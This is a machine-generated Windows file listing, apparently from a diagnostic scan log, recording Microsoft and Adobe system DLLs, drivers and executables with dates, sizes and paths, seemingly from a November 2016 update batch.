2016-11-12 07:31 - 2016-10-27 12:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-11-12 07:31 - 2016-10-27 12:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-11-12 07:31 - 2016-10-27 12:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-11-12 07:31 - 2016-10-27 12:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-11-12 07:31 - 2016-10-27 12:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-11-12 07:31 - 2016-10-27 12:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-11-12 07:31 - 2016-10-27 12:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-11-12 07:31 - 2016-10-27 12:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-11-12 07:31 - 2016-10-27 11:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-11-12 07:31 - 2016-10-27 11:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-11-12 07:31 - 2016-10-27 11:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-11-12 07:31 - 2016-10-27 11:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-11-12 07:31 - 2016-10-27 11:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-11-12 07:31 - 2016-10-27 11:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-11-12 07:31 - 2016-10-27 11:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-11-12 07:31 - 2016-10-27 11:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-11-12 07:31 - 2016-10-27 10:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-11-12 07:31 - 2016-10-27 09:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-11-12 07:31 - 2016-10-25 09:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-12 07:31 - 2016-10-22 11:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-11-12 07:31 - 2016-10-22 11:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-11-12 07:31 - 2016-10-22 11:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-11-12 07:31 - 2016-10-22 11:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-11-12 07:31 - 2016-10-22 11:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-11-12 07:31 - 2016-10-22 11:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-11-12 07:31 - 2016-10-22 11:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-11-12 07:31 - 2016-10-22 11:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-11-12 07:31 - 2016-10-22 11:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-11-12 07:31 - 2016-10-22 11:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-11-12 07:31 - 2016-10-22 11:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-11-12 07:31 - 2016-10-22 11:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-11-12 07:31 - 2016-10-22 11:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-11-12 07:31 - 2016-10-22 11:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-11-12 07:31 - 2016-10-22 11:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-11-12 07:31 - 2016-10-22 10:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-11-12 07:31 - 2016-10-22 10:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-11-12 07:31 - 2016-10-22 10:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-11-12 07:31 - 2016-10-22 10:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-11-12 07:31 - 2016-10-22 10:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-11-12 07:31 - 2016-10-22 10:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-11-12 07:31 - 2016-10-22 10:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-11-12 07:31 - 2016-10-22 10:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-11-12 07:31 - 2016-10-22 10:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-11-12 07:31 - 2016-10-22 10:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-11-12 07:31 - 2016-10-22 10:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-11-12 07:31 - 2016-10-22 10:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-11-12 07:31 - 2016-10-22 10:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-11-12 07:31 - 2016-10-11 07:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll
2016-11-12 07:31 - 2016-10-11 07:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2016-11-12 07:31 - 2016-10-10 09:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-11-12 07:31 - 2016-10-10 09:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-11-12 07:31 - 2016-10-10 09:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-11-12 07:31 - 2016-10-10 09:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-11-12 07:31 - 2016-10-10 09:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-11-12 07:31 - 2016-10-10 09:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-11-12 07:31 - 2016-10-10 09:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-11-12 07:31 - 2016-10-10 09:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-11-12 07:31 - 2016-10-10 08:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-11-12 07:31 - 2016-10-07 09:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-11-12 07:31 - 2016-10-07 09:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-11-12 07:31 - 2016-10-07 09:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-11-12 07:31 - 2016-10-07 09:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-11-12 07:31 - 2016-10-07 09:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-11-12 07:31 - 2016-10-07 09:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-11-12 07:31 - 2016-10-07 09:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-11-12 07:31 - 2016-10-07 09:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-11-12 07:31 - 2016-10-07 09:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-11-12 07:31 - 2016-10-07 09:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-11-12 07:31 - 2016-10-07 09:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-11-12 07:31 - 2016-10-07 09:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-11-12 07:31 - 2016-09-15 08:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-11-12 07:31 - 2016-09-12 13:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-11-12 07:31 - 2016-09-12 12:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-11-12 07:31 - 2016-09-12 12:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-11-12 07:31 - 2016-09-09 12:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-11-12 07:31 - 2016-09-08 14:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll
2016-11-12 07:31 - 2016-09-08 14:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll
2016-11-12 07:31 - 2016-09-08 14:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll
2016-11-12 07:31 - 2016-09-08 14:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll
2016-11-12 07:31 - 2016-09-08 08:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-11-12 07:31 - 2016-08-29 09:31 - 14183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-11-12 07:31 - 2016-08-29 09:31 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-11-12 07:31 - 2016-08-29 09:31 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-11-12 07:31 - 2016-08-29 09:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-11-12 07:31 - 2016-08-29 09:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-11-12 07:31 - 2016-08-29 09:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-11-12 07:31 - 2016-08-29 09:04 - 03229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-11-12 07:31 - 2016-08-29 08:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-11-12 07:31 - 2016-08-22 10:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-11-12 07:31 - 2016-08-12 11:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-11-12 07:31 - 2016-08-12 10:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-11-12 07:31 - 2016-08-12 10:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll
2016-11-12 07:31 - 2016-08-06 09:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-11-12 07:31 - 2016-08-06 09:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-11-12 07:31 - 2016-08-06 09:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-11-12 07:31 - 2016-08-06 09:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-11-12 07:31 - 2016-08-06 09:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-11-12 07:31 - 2016-08-06 09:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2016-11-12 07:31 - 2016-08-06 09:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-11-12 07:31 - 2016-08-06 09:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-11-12 07:31 - 2016-08-06 08:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2016-11-12 07:31 - 2016-06-14 11:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-11-12 07:31 - 2016-06-14 11:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-11-12 07:31 - 2016-06-14 11:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2016-11-12 07:31 - 2016-06-14 09:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-11-12 07:31 - 2016-06-14 09:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-11-12 07:30 - 2016-11-02 09:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-12 07:30 - 2016-11-02 09:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-11-12 07:30 - 2016-11-02 09:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-12 07:30 - 2016-11-02 09:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-11-12 07:30 - 2016-11-02 09:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-11-12 07:30 - 2016-11-02 09:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-12 07:30 - 2016-11-02 09:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-11-12 07:30 - 2016-11-02 09:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-11-12 07:30 - 2016-11-02 09:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-11-12 07:30 - 2016-11-02 08:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-12 07:30 - 2016-10-22 11:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-11-12 07:30 - 2016-10-15 09:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-11-12 07:30 - 2016-10-15 09:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-11-12 07:30 - 2016-10-15 09:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-11-12 07:30 - 2016-10-15 09:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-11-12 07:30 - 2016-10-11 09:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-11-12 07:30 - 2016-10-11 09:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2016-11-12 07:30 - 2016-10-11 09:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-11-12 07:30 - 2016-10-11 09:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2016-11-12 07:30 - 2016-10-11 09:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2016-11-12 07:30 - 2016-10-11 09:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2016-11-12 07:30 - 2016-10-11 09:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME
2016-11-12 07:30 - 2016-10-11 09:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-11-12 07:30 - 2016-10-11 09:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL
2016-11-12 07:30 - 2016-10-11 09:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll
2016-11-12 07:30 - 2016-10-11 09:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime
2016-11-12 07:30 - 2016-10-11 09:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime
2016-11-12 07:30 - 2016-10-10 09:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-11-12 07:30 - 2016-10-10 09:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-11-12 07:30 - 2016-10-10 09:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-11-12 07:30 - 2016-10-10 09:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-11-12 07:30 - 2016-10-10 09:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-11-12 07:30 - 2016-10-10 09:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-11-12 07:30 - 2016-10-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-11-12 07:30 - 2016-10-10 09:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-11-12 07:30 - 2016-10-10 09:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-11-12 07:30 - 2016-10-10 08:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-11-12 07:30 - 2016-10-10 08:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-11-12 07:30 - 2016-10-10 08:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-11-12 07:30 - 2016-10-10 08:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-11-12 07:30 - 2016-10-10 08:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
